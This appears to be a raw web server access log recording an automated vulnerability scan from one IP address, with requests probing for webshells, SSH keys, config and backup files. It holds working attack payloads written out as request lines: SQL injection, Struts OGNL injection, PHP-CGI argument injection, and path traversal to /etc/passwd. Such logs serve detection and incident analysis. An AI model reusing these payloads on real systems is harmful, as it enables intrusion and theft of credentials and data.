205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /ysqnnzfbky HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /config/config.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(4)%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /shell.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /oabzmuftgk HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /config/config.inc HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /shell.jsp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /.git/config HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET /shell.jspx HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET /pbmtlblcdc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET /shell.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "POST /auth/resetpassword HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET /settings.ini HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET /shell.aspx HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET /kcsxiiohpn HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET /application.ini HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:01 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /.git/HEAD HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /yflqoydqri HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /conf.ini HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /webshell.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /gbhakfechg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /.htaccess HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /app.ini HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /webshell.jsp HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /files/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /.htaccess.bak HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /configs/application.ini HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /webshell.jspx HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:02 +0530] "GET /configuration.ini HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /webshell.asp HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "POST /api/auth/login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /ufdiaslkys HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /webshell.aspx HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /config/config.ini HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /.htpasswd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /gqgtrpdeex HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /config.ini HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /userfiles;/userfiles/../WEB-INF/web.xml HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /.htpasswd.bak HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /1.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:03 +0530] "GET /.DS_Store HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /conf/config.ini HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /htpasswd.bak HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /1.jsp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /application/configs/application.ini HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /1.jspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /aflqtarifm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /php.ini HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /self.key HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /1.asp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /a.out HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /zfyccieste HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:04 +0530] "GET /.user.ini HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /1.aspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /code.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /fkbshuvarz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /db.ini HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "POST /servlet/sendData HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /src.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /s.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /temp.txt HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /qwpvhbtvks HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "POST /oputilsServlet HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /htdocs.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /s.jsp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /tmp.txt HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET /sshkzmyqsz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:05 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /webserver.tar.gz HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /s.jspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /.env HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /tools.tar.gz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /s.asp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /app.cfg HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /admin.html HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /webroot.zip HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /s.aspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /pvgvthhoxg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /admin.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /site.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:06 +0530] "GET /x.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /?a=display&templateFile=README.md HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /admin.jsp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /server.cfg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /x.jsp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /dddhwlkbhg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /install.tar.gz HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /admin.do HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(42079*43007),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /x.jspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /.vimrc HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /build.tar.gz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /admin.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /ddmcgvpaqf HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /deploy.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /v1/agent/self HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /x.asp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:07 +0530] "GET /login.html HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /vohabofunz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /zabbix/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /x.aspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /.ssh/known_hosts HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /ooxx.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /login.do HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /ooxx.jsp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:08 +0530] "GET /login.jsp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /ooxx.jspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /login.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /live_mfg.shtml HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /xtyxhhfqpq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /ooxx.asp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /backup/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /ooxx.aspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:09 +0530] "GET /admin HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /dama.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /frxyignzkz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "POST /res/url.html HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /dama.jsp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /signin HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /dama.jspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /config.json HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /dama.asp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:10 +0530] "GET /lkcidwmovu HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:11 +0530] "GET /dama.aspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:11 +0530] "GET /key HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:20:52:11 +0530] "GET /test.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:11 +0530] "GET /keys HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:11 +0530] "GET /test.jsp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:11 +0530] "GET /secret_key HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:11 +0530] "GET /zabbix/setup.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:11 +0530] "GET /orpngtgzir HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /test.jspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /secret HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /setup.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /solr/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /test.asp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /.secret HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /kivnbaiylv HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /sslvpn/img/../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /test.aspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /.key HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:12 +0530] "GET /.idea/workspace.xml HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:52:13 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:13 +0530] "GET /.secret_key HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:13 +0530] "GET /uldycketxu HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:13 +0530] "GET /phpspy.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:13 +0530] "GET /gkbscgvsdg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:13 +0530] "GET /jspspy.jsp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:13 +0530] "GET /evaihrsuqk HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:13 +0530] "GET /.idea/modules.xml HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:14 +0530] "GET /jspspy.jspx HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:14 +0530] "GET /key.txt HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:14 +0530] "GET /aspxspy.aspx HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:14 +0530] "GET /mainpage/msglog.aspx?user=1%27%20and%201=convert(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27117167%27))))-- HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:52:15 +0530] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:15 +0530] "GET /gxrptulcxb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:15 +0530] "GET /.ssh/id_rsa HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:16 +0530] "GET /texasotgec HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:16 +0530] "GET /sftp-config.json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:16 +0530] "GET /.ssh/id_dsa HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:16 +0530] "GET /id_dsa HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:16 +0530] "GET /id_rsa HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:16 +0530] "GET /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(203035087)%29%23 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:17 +0530] "GET /tmbgyoldfc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:17 +0530] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(0)))HQYx) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:52:17 +0530] "GET /otwhgfryfm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:17 +0530] "GET /index.php~ HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:17 +0530] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(6)))HQYx) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:52:17 +0530] "GET /phpinfo.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:17 +0530] "GET /config.php~ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:18 +0530] "GET /info.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:18 +0530] "GET /index.php.bak HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:18 +0530] "GET /i.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:18 +0530] "GET /config.php.bak HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:18 +0530] "GET /tz.php HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:18 +0530] "GET /db.php.bak HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:18 +0530] "GET /includes/mysql2i/mysql2i.func.php HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:52:18 +0530] "GET /php.php HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /wqrdpcvsmh HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /config.inc.php.bak HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /test.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /proxy.pac HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /.index.php.swp HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /pswozfbgkq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /.config.inc.php.swp HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /.bash_history HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /config/.config.php.swp HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:52:19 +0530] "GET /1.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:20 +0530] "GET /.zsh_history HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:20 +0530] "GET /.config.php.swp HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:20 +0530] "GET /p.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:20 +0530] "GET /vcusggggfb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:20 +0530] "GET /.settings.php.swp HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:20 +0530] "GET /debug.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:20 +0530] "GET /.rediscli_history HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:20 +0530] "GET /.database.php.swp HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:21 +0530] "GET /ymsprandte HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:21 +0530] "GET /.db.php.swp HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:21 +0530] "GET /.mysql_history HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:21 +0530] "GET /.mysql.php.swp HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:21 +0530] "GET /ui/login.php?user=admin HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:21 +0530] "GET /ofxrudzhuw HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "GET /kgplbuukrg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "GET /index.cgi.bak HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "POST /pages/doenterpagevariables.action HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "GET /ipzcsczcvg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "GET /gxatnbuilb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "GET /index.bak HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:22 +0530] "GET /../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:52:23 +0530] "GET /%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd HTTP/1.1" 404 1274
195.96.129.4 - - [19/Oct/2025:20:52:23 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:23 +0530] "GET /rcmycrgapt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:23 +0530] "GET /config.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:24 +0530] "GET /conf.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:24 +0530] "GET /conf/conf.zip HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:24 +0530] "GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=xxx&max_rows=10 HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:20:52:24 +0530] "GET /vqlslnmkmd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:24 +0530] "GET /o.tar.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:24 +0530] "GET /help/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:25 +0530] "GET /x.tar.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:25 +0530] "GET /pgbxygnefe HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:25 +0530] "GET /output.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:25 +0530] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:25 +0530] "GET /db.inc HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:25 +0530] "GET /backup.sql.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:25 +0530] "GET /config/database.yml HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:52:25 +0530] "GET /database.sql.gz HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:26 +0530] "GET /database.yml HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:26 +0530] "GET /dump.sql.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:26 +0530] "GET /cylsivmhrc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:26 +0530] "GET /db.sql.gz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:26 +0530] "GET /db.conf HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:26 +0530] "GET /back.tar.bz2 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:27 +0530] "GET /zapsreeimq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:27 +0530] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 1012
